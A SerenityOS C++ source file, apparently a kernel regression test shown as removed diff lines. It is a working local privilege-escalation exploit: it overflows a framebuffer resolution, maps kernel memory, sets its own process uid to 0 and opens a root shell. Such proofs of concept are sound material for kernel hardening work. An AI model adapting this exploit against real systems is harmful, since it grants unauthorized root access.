123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105 |
- /*
- * Copyright (c) 2018-2020, the SerenityOS developers.
- *
- * SPDX-License-Identifier: BSD-2-Clause
- */
- #include <AK/Types.h>
- #include <fcntl.h>
- #include <stdio.h>
- #include <string.h>
- #include <sys/ioctl.h>
- #include <sys/mman.h>
- #include <unistd.h>
- int main()
- {
- int fd = open("/dev/fb0", O_RDWR);
- if (fd < 0) {
- perror("open");
- return 1;
- }
- size_t width = 17825;
- size_t height = 1000;
- size_t pitch = width * 4;
- size_t framebuffer_size_in_bytes = pitch * height * 2;
- FBHeadProperties original_properties;
- original_properties.head_index = 0;
- if (ioctl(fd, FB_IOCTL_GET_HEAD_PROPERTIES, &original_properties) < 0) {
- perror("ioctl");
- return 1;
- }
- FBHeadResolution resolution;
- resolution.head_index = 0;
- resolution.width = width;
- resolution.height = height;
- resolution.pitch = pitch;
- if (ioctl(fd, FB_IOCTL_SET_HEAD_RESOLUTION, &resolution) < 0) {
- perror("ioctl");
- return 1;
- }
- auto* ptr = (u8*)mmap(nullptr, framebuffer_size_in_bytes, PROT_READ | PROT_WRITE, MAP_SHARED | MAP_FILE, fd, 0);
- if (ptr == MAP_FAILED) {
- perror("mmap");
- return 1;
- }
- printf("Success! Evil pointer: %p\n", ptr);
- u8* base = &ptr[128 * MiB];
- uintptr_t g_processes = *(uintptr_t*)&base[0x1b51c4];
- printf("base = %p\n", base);
- printf("g_processes = %p\n", (void*)g_processes);
- auto get_ptr = [&](uintptr_t value) -> void* {
- value -= 0xc0000000;
- return (void*)&base[value];
- };
- struct ProcessList {
- uintptr_t head;
- uintptr_t tail;
- };
- struct Process {
- // 32 next
- // 40 pid
- // 44 uid
- u8 dummy[32];
- uintptr_t next;
- u8 dummy2[4];
- pid_t pid;
- uid_t uid;
- };
- ProcessList* process_list = (ProcessList*)get_ptr(g_processes);
- Process* process = (Process*)get_ptr(process_list->head);
- printf("{%p} PID: %d, UID: %d, next: %p\n", process, process->pid, process->uid, (void*)process->next);
- if (process->pid == getpid()) {
- printf("That's me! Let's become r00t!\n");
- process->uid = 0;
- }
- FBHeadResolution original_resolution;
- original_resolution.head_index = 0;
- original_resolution.width = original_properties.width;
- original_resolution.height = original_properties.height;
- original_resolution.pitch = original_properties.pitch;
- if (ioctl(fd, FB_IOCTL_SET_HEAD_RESOLUTION, &original_resolution) < 0) {
- perror("ioctl");
- return 1;
- }
- execl("/bin/sh", "sh", nullptr);
- return 0;
- }
|